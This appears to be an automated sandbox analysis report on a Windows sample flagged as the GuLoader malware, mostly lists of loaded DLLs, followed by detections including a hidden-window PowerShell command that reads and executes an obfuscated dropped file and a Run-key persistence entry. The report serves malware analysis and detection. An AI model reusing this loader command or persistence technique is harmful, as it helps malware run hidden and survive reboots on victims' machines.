Source: C:\Users\user\Desktop\file.exe	Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sti.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: napinsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: pnrpnsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wshbth.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: nlaapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winrnr.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sti.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000000F.00000002.2205196768.000000000F541000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1641973533.000000000E71D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"

Suspicious powershell command line found

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udbygningerne230
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udbygningerne230

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
